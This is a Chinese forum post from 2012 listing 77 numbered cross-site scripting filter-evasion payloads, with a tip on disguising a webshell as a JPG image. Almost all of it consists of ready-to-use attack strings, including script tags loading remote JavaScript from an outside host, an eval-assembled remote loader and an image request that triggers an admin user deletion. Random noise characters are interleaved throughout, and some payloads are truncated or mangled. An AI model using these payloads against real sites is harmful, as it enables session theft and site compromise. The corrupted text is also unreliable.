跨站图片shell
3 s& ^( I ?, E. h0 HXSS跨站代码 <script>alert("")</script>! ~8 v9 U) k! [" p. H; b+ }4 n
2 o* V/ W! E3 ~3 _. k( A将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
0 E' ^" {+ T% S9 n+ f- d$ i
; p; h+ {9 j+ W. d9 O" B- V4 S9 B
$ O% g( }6 c& ?2 Q3 i( j+ L- w8 G% W' O6 R; k0 C
1)普通的XSS JavaScript注入5 H; j: g0 w2 z( U6 u6 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ F! w2 C3 j( @( P* [: y& t) F
5 }9 ~+ Q+ Q+ x( M" X4 x$ i6 P; R! ^
(2)IMG标签XSS使用JavaScript命令3 z+ p3 c, P" p2 l/ Z2 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 a# Y1 \: a5 |+ A M* U( X
" f( b7 u' U6 u* X
(3)IMG标签无分号无引号9 j- q6 @( a0 o) W" R' N/ X
<IMG SRC=javascript:alert(‘XSS’)>
- ?) h" c% K/ Q
7 y8 D5 ~5 a8 A; z. S8 j% G$ f6 a* f(4)IMG标签大小写不敏感
) Q. s) G ^- U C<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- C1 n8 J u( k+ V% b" c3 X
: i# i' a; G% H9 n7 V1 L(5)HTML编码(必须有分号)/ b! a) p8 ]% J" l% L8 M6 U# L W
<IMG SRC=javascript:alert(“XSS”)>
& U- n& f9 ?! Q
8 B3 u' v( A& _$ c' ?, R(6)修正缺陷IMG标签8 ~3 h$ k8 T8 A- ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( I) ?) J0 e {+ Z
; j/ c1 d# \% T& C* U1 m
(7)formCharCode标签(计算器)0 N3 O" b9 I! k; s1 o! i" n
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 |! C1 s9 Z6 H8 R& c* j3 |5 ~4 D' F
(8)UTF-8的Unicode编码(计算器)$ ?! g% C S! L8 l2 I; K* t
<IMG SRC=jav..省略..S')>
; m( G5 s. d$ U( y: n" o" X, m
- P7 T8 q, m4 ?4 i+ M T* f+ F(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; d( s5 @( Z9 O5 H0 J<IMG SRC=jav..省略..S')>
' }. a) e. z3 z1 K; m( Q$ P% x0 f# R* k+ `( y; ^4 I
(10)十六进制编码也是没有分号(计算器)
' P# g! ?8 A6 Y& i2 N5 F<IMG SRC=java..省略..XSS')>9 `# ]/ } b& w- p/ A
- M1 G% v# e$ ^: y(11)嵌入式标签,将Javascript分开1 H8 d! L; C- G5 ]) ^+ S
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 f; x- V( f/ p1 l* D0 h
6 Z" a: V( ]! A0 N) [* N
(12)嵌入式编码标签,将Javascript分开. P2 x1 ^! `: Y+ Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ K5 O# P& N$ \! R& p g% q* \+ f
: W) {& B" s9 C2 L' h& s; V& p0 S
(13)嵌入式换行符' S7 U' F2 g+ c- |( v
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 \) f# p7 e( o# f! {
0 ` m! P" D: t4 Y% [(14)嵌入式回车: j- n0 C/ S; @5 D; x
<IMG SRC=”jav ascript:alert(‘XSS’);”>' p ~ T. ~5 ~" L1 _, m
: C _) A: S. z! L(15)嵌入式多行注入JavaScript,这是XSS极端的例子! J1 G1 U5 @% h1 M
<IMG SRC=”javascript:alert(‘XSS‘)”>
% s) t( f% M, J+ @8 s0 m% Z6 Z1 B
(16)解决限制字符(要求同页面)% G4 {$ x. G( t' a3 X w0 b9 t1 I
<script>z=’document.’</script>
8 I$ I+ i: W# M. A* d<script>z=z+’write(“‘</script>. g4 z W% i( N! v, ^* l4 R
<script>z=z+’<script’</script>
$ `9 Z1 k, s) y. Z6 o<script>z=z+’ src=ht’</script>8 l. P7 j# D) d r3 U: s
<script>z=z+’tp://ww’</script>
" X7 G6 Y1 A& M0 c9 E/ m<script>z=z+’w.shell’</script>
2 x+ _3 F5 J. q+ j$ b4 j. H<script>z=z+’.net/1.’</script>, Q& q% { j& x. H! N6 ^
<script>z=z+’js></sc’</script>
* l7 f& m1 t9 ]<script>z=z+’ript>”)’</script>; K/ M. Z/ A5 i; H9 M( d, O
<script>eval_r(z)</script>
# S' ^7 t d3 w+ ?. a0 C6 D1 Z* r* d3 r" k- v
(17)空字符5 i, N6 e' f8 X4 o! C: t
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# c8 M: ^. `7 O- I. K) F
7 ^: E- Z% N1 `
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ L$ _6 f0 O! {, Y0 w" F
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 v6 m% {9 F9 ^. m8 A% }
' L7 H" r# N0 a, |0 p(19)Spaces和meta前的IMG标签& |% Y5 o: V( w- [9 L/ v
<IMG SRC=” javascript:alert(‘XSS’);”>
( }4 L5 }* v* n4 R8 s" Q0 x* {& ]" l$ S8 `9 [0 l
(20)Non-alpha-non-digit XSS
& l% B n9 u* g4 u<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 T) v; k3 H1 z' }$ M
- N+ m" {0 p+ g0 D' f, ?. e$ ~(21)Non-alpha-non-digit XSS to 2" Y. l+ f! z- @8 Y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 Z/ O' @8 |* m% x! E3 C
5 b" @3 ?4 V' _2 C. c5 p
(22)Non-alpha-non-digit XSS to 3- S( m1 q3 q4 ?9 r
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& B& l. E- S- }
: f7 g5 r- D. h% _$ p4 S
(23)双开括号+ a; s0 s0 h8 A ~& X
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% C; }/ G0 e$ a+ l1 V1 g2 F, M8 B7 P: e* X4 \
(24)无结束脚本标记(仅火狐等浏览器)
: r8 k& t( w, _ h* h; R<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 S7 ~; p: I0 ^8 M8 I+ c
/ B7 V1 r# L- l' F(25)无结束脚本标记2# z! F# R: F5 D7 S# R6 i' e4 {' W
<SCRIPT SRC=//3w.org/XSS/xss.js>
6 F5 t% C" j7 x$ d3 D! z6 `2 A1 o5 l: j' J- p# w* }
(26)半开的HTML/JavaScript XSS
+ {% p. r B3 _+ H% m( S<IMG SRC=”javascript:alert(‘XSS’)”, j0 q+ D/ a. b. C
/ e% a9 J' k1 O" Z7 n3 Z ^1 W
(27)双开角括号. d5 Q# j4 G1 u# b" p1 T, v
<iframe src=http://3w.org/XSS.html <7 D" i! T; n6 X: H- p
8 \3 k& R) y- R+ x9 D( l(28)无单引号 双引号 分号
+ @& S& J# p! a8 f8 {' c6 T<SCRIPT>a=/XSS/- J- p. O/ V2 V( s' W3 d4 D
alert(a.source)</SCRIPT>
7 ^8 m* F8 L+ U+ W$ w) ~) k* Z; R. w+ n- G5 _ V. t' o ?- L
(29)换码过滤的JavaScript& L% q; O) I0 F7 P4 V& _& s9 H
\”;alert(‘XSS’);//& m2 Z. x; e3 B" {: ^* P2 @
7 j0 {6 g+ s% J P: }. h(30)结束Title标签- N' F& H. H" s- |% t; P8 O
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 K9 H+ X" U0 k, i/ i* K
7 A% Y/ B1 g) a2 }0 P5 R(31)Input Image
+ _) s. i/ ?3 A<INPUT SRC=”javascript:alert(‘XSS’);”>1 J) m! X2 z5 ?7 W& I+ u
! i! U0 s' D/ {6 S" w0 {# H6 M5 {
(32)BODY Image3 x0 h2 ?9 n4 `4 o/ U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 _+ O2 p9 \0 x, @% P/ \; K& G3 C
(33)BODY标签
# v7 ?" z$ i2 ~<BODY(‘XSS’)>
$ k3 D: _8 k) g
$ O5 h' ]8 Z5 `+ E' k8 d(34)IMG Dynsrc
" n( _# T" n1 q. v& Q* K<IMG DYNSRC=”javascript:alert(‘XSS’)”>. ^$ L1 g* K! o
+ A5 u" |/ M7 p
(35)IMG Lowsrc
$ a* f* Y z8 I# V0 c2 Y& P<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- ^' K, d( c. ]8 ?' c8 v1 P y* {% ^" |" g0 y' M8 Y
(36)BGSOUND
* B1 E3 Q- i' ?5 L, H<BGSOUND SRC=”javascript:alert(‘XSS’);”>: z) H& {) q. y$ B' ` d
4 T' r' z, S; z* R" }; Y( @$ m2 ](37)STYLE sheet
, l+ m" ]5 k, T* z$ L5 z$ C; m<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ S) Q! r7 g1 x/ h! X) ^" G+ D1 S$ E! E+ y9 @
(38)远程样式表4 n& `& t) B5 g% f5 G* |
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> S/ n# }8 _& d& \4 X) L
2 ^7 N" s2 i' M1 t1 B( z
(39)List-style-image(列表式)9 O* G: S: S: {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( ]% F* S: R* l# K4 R: r7 E
* V2 F% h& w/ W. Q(40)IMG VBscript
6 M, z! J3 j6 M2 ^<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
m" Q* D, l5 e% D: p- w H6 Q; N$ u
(41)META链接url
, d5 h6 g& y7 k- E. ^0 V<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>- z0 ~* `( k g) A
^' k0 r ~3 Z; w% M& r
(42)Iframe
$ e. v# E( P1 m<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
9 o6 Y! w) x4 H* e# W! P( ?(43)Frame2 I1 J \! ? a# y% Z5 k
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 R: I5 L. F, `0 b3 u! z5 t0 ]4 \8 L: G9 Z9 Z& m
(44)Table+ q/ x' n9 @3 F3 ]! P5 ]0 o
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>/ ~0 x" T; g1 _$ P1 P" l
; T h% t- I1 z" g" H$ d
(45)TD& k8 H# \6 w5 F. o4 u
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; P- m A6 `; E! ]7 i
' P. }) M% l t(46)DIV background-image7 _4 q: y$ e4 R' o+ x: w# [
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 `- g) C$ C9 }5 H7 @' r% @
, m3 h8 u. N: d" o6 X(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
* [7 \, K$ ]0 Y! j$ f/ U<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
) W4 d5 Q- i. W+ C) H. S
Z- T% w. f3 p- g" F(48)DIV expression% `' G" X, Y9 o; w9 Q3 D# p3 ~
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 ^$ }6 _9 ?7 V7 t# }
$ r1 G$ u' t! n' y7 a8 ?3 N2 [(49)STYLE属性分拆表达/ f, v0 p. [9 H, }8 X, c- _
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> w0 D4 r, M) N
& s! K& I2 I! X f D
(50)匿名STYLE(组成:开角号和一个字母开头)
5 K4 c- {! v. H# i6 l! n<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 w) `8 z, S9 V. {4 Z1 P$ ^& B; M/ [ v! u; x
(51)STYLE background-image
D+ b7 G! X. S' r) d* F% x# G1 E<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
; f( ~9 T) T8 _* t4 V' d$ H' g- E4 }2 B8 c4 v3 s
(52)IMG STYLE方式
* n: ]+ ~& W+ J: Dexppression(alert(“XSS”))’>
3 |/ |& c4 i; b1 J; B6 D1 C) s6 a9 ?$ G
(53)STYLE background
. h+ M* F0 C. x<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ c& X; i) T2 k# D, @ I
6 i4 c, f$ @: d, W: Z(54)BASE
9 E6 u. S: L; W2 r: I: Q+ W<BASE HREF=”javascript:alert(‘XSS’);//”>5 p0 H0 y# e* f& E# W
- R8 w) ` _7 {$ B; T0 s(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 {/ `9 F/ q! m7 y<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
; ~0 _ i2 _2 Z; d% U7 H9 u$ N n6 i( s
(56)在flash中使用ActionScrpt可以混进你XSS的代码; @4 h$ \ O. o5 k6 f
a=”get”;* X7 J7 C, r( s7 W3 N0 Q
b=”URL(\”";
9 i7 C1 W% q, A% Ac=”javascript:”;% W) s" v' ?( X/ U) P: W
d=”alert(‘XSS’);\”)”;" d! E! T' q- H \0 ]# N
eval_r(a+b+c+d);# B% E0 }- [& R
! T# G! g5 ^& H0 t(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 c/ N% s& }) I- Z! p<HTML xmlns:xss>
, e& O9 N; r E/ P<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
$ s; m' O: v+ g% D<xss:xss>XSS</xss:xss>4 K* w) n3 _ j+ x3 j! G
</HTML>
& N/ _8 }: t; W" X
. f1 V/ `; L) M3 Y2 h( [(58)如果过滤了你的JS你可以在图片里添加JS代码来利用, E% T3 L" b) V" t/ b2 K
<SCRIPT SRC=””></SCRIPT>- @' ~: |. e1 }+ L' i9 ?& T5 J4 Y& K
' l" U; ?& N4 C5 _/ ^% J, `% ^
(59)IMG嵌入式命令,可执行任意命令
1 d8 [1 _! K1 I s$ x<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 J0 j3 e5 g; i3 `. d7 j
1 B& R2 n; x; n; Q, W
(60)IMG嵌入式命令(a.jpg在同服务器)
7 W6 `- z* E# X; l* G/ T9 q4 ^Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
: H) G) t. A4 e/ l) H& h' i4 d$ n9 }3 Z, o+ }
(61)绕符号过滤, S9 x; x% l' c- u
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 o7 z9 t8 l( {5 M
; B0 U( i+ o+ L. }& _! B0 m7 o# A2 h(62)
4 W2 |: R5 R* q<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 I' f5 q9 }- x% Y v# ?1 o- k
% X; Z+ N. O) \(63)
4 T" T8 }8 K+ g<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& Z' x, g! o4 S* e4 i( ^; c; M+ o2 O+ M
(64) E" G: Z1 C& p# o+ W) }
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; V- r- Y; b7 L4 x/ U
+ F8 {) A! Z: p; r+ M
(65)5 g' v Y7 F3 W/ [' w; |4 N) d3 g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> Q1 v6 q; P2 X6 \8 E4 l. \$ X
& @/ `, ^8 s% p. T) s: Z(66)
. \& c1 f+ h6 B/ o0 x<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ i& K9 n, ]) u; @. ^
" I/ U( Q) X# g2 {( X, t(67)
$ I% l, \$ b% \! o<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
8 f( S* l* C# Q8 V }9 Y! Z
1 o; z# _5 G) A5 t+ W/ F(68)URL绕行 O( g5 p8 z# y, Y" |% A# o
<A HREF=”http://127.0.0.1/”>XSS</A>
+ E ^7 \9 x0 c
5 B8 k( w1 [& k/ H(69)URL编码1 @5 [; ?( K- u K) L3 w
<A HREF=”http://3w.org”>XSS</A>
9 X! W B8 E' @3 L4 T+ N" c+ m
: \$ A) O/ Q! Q(70)IP十进制
, K* l: e0 V+ }; H% x2 D<A HREF=”http://3232235521″>XSS</A>1 L: m1 b0 l4 d6 u, c/ Q" D7 Z
+ F! S3 l; g' M3 J4 _(71)IP十六进制, X& _8 U O. M5 D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- Z$ X* N+ }: R
! J$ J$ n5 P6 j, O) G9 k2 }(72)IP八进制
: P5 r" A* i% u; H( t2 x: V+ M+ A<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ ?+ ]* g8 |2 t. i
9 {! m' B+ f4 q(73)混合编码
+ p6 Y1 _$ \; T7 h l% G<A HREF=”h7 {/ e6 h% C6 j0 g, y" U/ F
tt p://6 6.000146.0×7.147/”">XSS</A>' C/ \- x" ~: ^1 c; s6 u4 N1 \" {
, \9 _% @9 P3 Y6 p, W( b: Y y9 a(74)节省[http:]
! U7 N% C, _ q. b3 C% b M<A HREF=”//www.google.com/”>XSS</A>* ~5 y8 {' { U* ^
/ m, ^ Q1 T9 _" B4 L5 F: ?
(75)节省[www]
1 ?( ], }8 Q* s<A HREF=”http://google.com/”>XSS</A>
# t1 d8 M# I- t$ p3 c' B* ^
. B( m0 p5 Q; P& t6 w(76)绝对点绝对DNS
8 g) M: v. y/ `$ @<A HREF=”http://www.google.com./”>XSS</A>
/ U( F. ~3 @. p* @: Y6 s1 y" q. M! K2 a' |: l3 C: c V5 _+ U
(77)javascript链接
1 W9 A5 x7 L6 }& R9 |! X2 ]9 i<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
! F% c; Z( C2 a N( b( P1 S |
发表于 2012-9-13 17:04:56
收藏
支持
反对